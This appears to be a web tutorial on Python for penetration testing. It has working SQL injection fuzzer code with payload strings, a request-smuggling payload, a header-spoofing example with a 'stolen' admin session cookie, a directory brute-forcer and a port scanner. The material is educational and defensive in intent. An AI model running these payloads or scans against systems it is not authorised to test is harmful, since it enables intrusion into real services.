Python for Penetration Testing: Scripting Custom Exploits and Automation
Python is the de facto language of penetration testing. It's available on almost every Linux system, has an enormous library ecosystem, and produces readable, maintainable scripts. This guide covers practical Python for security professionals — from automating HTTP testing to writing raw packet-level tools.
Essential Libraries
Python Security Scripting Best Practices
Always use virtual environments for security tools to avoid dependency conflicts. Use requests with verify=False only in lab environments — production pentests should use proper certificate validation unless specifically testing TLS issues. Use asyncio and aiohttp for high-speed scanning to avoid rate limits.
Python Security Libraries Reference
| Library | Use Case | Security Feature | Install | Example |
|---|---|---|---|---|
| requests | HTTP clients, fuzzing | Session handling, proxy support | pip install requests | requests.get(url, proxies=burp) |
| scapy | Packet crafting, network analysis | Raw socket manipulation | pip install scapy | IP()/TCP()/send() |
| pwntools | CTF exploitation, binary analysis | ROP chains, shellcode | pip install pwntools | from pwn import * |
| impacket | Active Directory attacks, SMB | Kerberos, NTLM, SMB libs | pip install impacket | GetUserSPNs.py |
| cryptography | Hash cracking, crypto analysis | Multiple cipher support | pip install cryptography | Fernet, RSA, AES |
| paramiko | SSH automation, SFTP | SSH key and password auth | pip install paramiko | SSHClient().connect() |
| ldap3 | LDAP enumeration, injection testing | LDAP bind and search | pip install ldap3 | Server() + Connection() |
- requests — HTTP automation, session handling, proxy support
- beautifulsoup4 — HTML parsing for scraping and extraction
- socket — raw TCP/UDP connections (built-in)
- subprocess — execute system commands and capture output
- threading / concurrent.futures — parallel execution
- scapy — packet crafting and analysis
- argparse — CLI argument parsing for your tools
- colorama — colored terminal output
pip install requests beautifulsoup4 scapy colorama
The requests Library for HTTP Automation
The requests library is your primary tool for web application testing automation. Key patterns:
Session Handling
import requests
# Session persists cookies across requests (essential for authenticated testing)
session = requests.Session()
# Login
login_data = {"username": "testuser", "password": "testpass"}
resp = session.post("https://example.com/login", data=login_data)
# Subsequent requests use the authenticated session cookie automatically
resp = session.get("https://example.com/api/profile")
print(resp.json())
Proxy Through Burp Suite
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080"
}
# Disable SSL verification for Burp's self-signed cert
resp = requests.get(
"https://example.com/endpoint",
proxies=proxies,
verify=False,
headers={"X-Custom-Header": "test"}
)
print(resp.status_code, resp.text[:200])
Custom Headers and Cookies
headers = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
"X-Forwarded-For": "127.0.0.1",
"User-Agent": "Mozilla/5.0 (compatible; custom-scanner/1.0)"
}
cookies = {
"session": "stolen_session_token",
"role": "admin"
}
resp = requests.get("https://example.com/admin", headers=headers, cookies=cookies)
Writing a Basic SQLi Fuzzer
import requests
import urllib3
urllib3.disable_warnings()
TARGET = "https://example.com/search"
PROXY = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
PAYLOADS = [
"'",
"''",
"' OR '1'='1",
"' OR '1'='1'--",
"1; SELECT SLEEP(5)--",
"1 AND SLEEP(5)--",
"' UNION SELECT NULL--",
"' UNION SELECT NULL,NULL--",
]
ERROR_PATTERNS = [
"mysql", "sql syntax", "warning", "ORA-", "pg_", "sqlite",
"syntax error", "unterminated", "unexpected"
]
import time
for payload in PAYLOADS:
start = time.time()
try:
resp = requests.get(
TARGET,
params={"q": payload},
proxies=PROXY,
verify=False,
timeout=10
)
elapsed = time.time() - start
body_lower = resp.text.lower()
# Check for error-based SQLi
if any(p in body_lower for p in ERROR_PATTERNS):
print(f"[ERROR-BASED] payload={payload!r} matched error pattern")
# Check for time-based SQLi
if elapsed > 4.5:
print(f"[TIME-BASED] payload={payload!r} response={elapsed:.1f}s")
except requests.exceptions.Timeout:
print(f"[TIMEOUT] payload={payload!r} (possible blind injection)")
except Exception as e:
print(f"[ERROR] payload={payload!r} exception={e}")
Threading for Parallel Testing
Sequential scanning is slow. Use concurrent.futures for parallel HTTP requests:
from concurrent.futures import ThreadPoolExecutor, as_completed
import requests
TARGETS = open("targets.txt").read().splitlines()
WORDLIST = open("/usr/share/wordlists/dirb/common.txt").read().splitlines()
MAX_WORKERS = 20
def check_path(base_url, path):
url = f"{base_url.rstrip('/')}/{path}"
try:
resp = requests.get(url, timeout=5, allow_redirects=False)
if resp.status_code not in [404, 400, 403]:
return url, resp.status_code
except:
pass
return None
results = []
with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
futures = {
executor.submit(check_path, target, path): (target, path)
for target in TARGETS
for path in WORDLIST
}
for future in as_completed(futures):
result = future.result()
if result:
url, status = result
print(f"[{status}] {url}")
results.append(result)
Raw TCP Connections with socket
import socket
def send_raw_http(host, port, raw_request):
"""Send a raw HTTP request over TCP."""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(raw_request.encode())
response = b""
while True:
chunk = s.recv(4096)
if not chunk:
break
response += chunk
s.close()
return response.decode(errors='replace')
# Useful for HTTP request smuggling tests
request = (
"POST / HTTP/1.1\r\n"
"Host: example.com\r\n"
"Content-Length: 6\r\n"
"Transfer-Encoding: chunked\r\n"
"\r\n"
"0\r\n"
"\r\n"
"X-Foo: x"
)
print(send_raw_http("example.com", 80, request)[:500])
Simple Port Scanner
import socket
import concurrent.futures
def scan_port(host, port, timeout=1):
try:
with socket.create_connection((host, port), timeout=timeout):
return port, True
except:
return port, False
def port_scan(host, ports):
open_ports = []
with concurrent.futures.ThreadPoolExecutor(max_workers=100) as ex:
futures = {ex.submit(scan_port, host, p): p for p in ports}
for f in concurrent.futures.as_completed(futures):
port, is_open = f.result()
if is_open:
open_ports.append(port)
print(f"[OPEN] {host}:{port}")
return sorted(open_ports)
top_ports = list(range(1, 1025)) + [1433, 3306, 3389, 5432, 8080, 8443, 8888]
port_scan("192.168.1.1", top_ports)
Integrating with Existing Tools
import subprocess
import json
def run_nmap(target):
"""Run nmap and parse XML output."""
result = subprocess.run(
["nmap", "-sV", "-oX", "-", target],
capture_output=True,
text=True,
timeout=120
)
return result.stdout
def run_nuclei_json(targets_file, templates_dir):
"""Run nuclei and collect JSON output."""
result = subprocess.run(
["nuclei", "-l", targets_file, "-t", templates_dir,
"-json", "-silent", "-no-color"],
capture_output=True,
text=True,
timeout=3600
)
findings = []
for line in result.stdout.splitlines():
try:
findings.append(json.loads(line))
except json.JSONDecodeError:
pass
return findings
Integrate your Python automation output with the Pentest Findings Documenter to convert raw tool results into structured report-ready findings. Use the Smart Paste tool to parse and categorize pasted tool output automatically.
Level up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides